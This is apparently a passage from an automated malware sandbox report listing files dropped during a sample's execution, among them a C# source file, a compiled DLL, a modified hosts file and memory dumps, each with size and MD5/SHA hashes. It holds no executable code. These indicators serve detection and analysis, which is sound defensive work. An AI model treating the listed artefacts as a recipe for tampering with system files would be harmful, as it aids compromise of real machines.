8de06d74aa515c9511fb4af34c666e2d

SHA1
cc751046dcc4994f0c028b215bae4acf450ecbe7

SHA256
e00990ba633acfb1428b130b903075ccbba73e17441e2f529dbd3b3d5e0f9534

SHA512
29fe1d4711825c4aae87be03847009ceebccfe3e3fbe3e0b61f51ec1b3259747452c185ced208506d7e76315280eaedd64346afaed4e15f23160663d1e33a586

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ur11woet.zl4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fgpenwup\fgpenwup.dll

Filesize
4KB

MD5
9cbb6aa1ba9022288c79bd9182bed25a

SHA1
b1cee5be50b39a1fd430f500d3dba812a74382ee

SHA256
f9b293852567960b2541b1faec046b458c1dede883fc686e0f48a5f8c7675877

SHA512
74c6a770a53eb71cd4c2baff9ea4568cc4ccdf12ccfcfdefb0c3010dfe2692919626032ea16a18c82cda1ef3eea8e74a2b50e7bfd8232b07d5df5b5c1deac6f9

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fgpenwup\CSC138F0812606943FDAAFDE81F4E9BCB11.TMP

Filesize
652B

MD5
31d1b091a444e2c39514c01133d14c16

SHA1
ec01e65e7bf41ec441e56ff6792f3840d15984c3

SHA256
cc5b1fb68a7da2668c0bc5681288ef672c967768895693231ffdcff9f1060c56

SHA512
6951f659e9b2f6afe6082bb1a8d2e6e589b689a4e1e369dbacef479d8bebfac25bb77b9804bc5fcfd27abdedb951866cefb62c5b657a7353da03b9b2471d69d3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fgpenwup\fgpenwup.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fgpenwup\fgpenwup.cmdline

Filesize
607B

MD5
037c56a281e22ae8739bd8d5f36dbc17

SHA1
cc394aa855b72dd954f00baa0de8cc79f7ce2488

SHA256
236042cfea0f81150a69af841635e91a017799a3638a8dc11a70aab95f14d882

SHA512
b7fcf960bc1dc649e1c684f3cc68a0d572aaf4e58fae8b25eac7af96e7eeb7656aff6024ed4e187e38b517f92b6a52892512961f8e2dc504df0707aa517b6efc

Download Submit
memory/1944-63-0x000001BAB58E0000-0x000001BAB58E8000-memory.dmp

Filesize
32KB

Download
memory/3292-7-0x00000141FAFD0000-0x00000141FAFF2000-memory.dmp

Filesize
136KB

Download